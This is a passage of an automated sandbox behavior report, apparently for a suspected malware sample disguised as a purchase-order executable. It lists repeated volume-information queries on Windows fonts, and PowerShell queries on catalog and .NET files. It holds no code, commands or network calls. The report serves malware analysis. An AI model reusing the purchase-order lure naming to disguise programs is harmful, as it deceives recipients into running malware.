                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
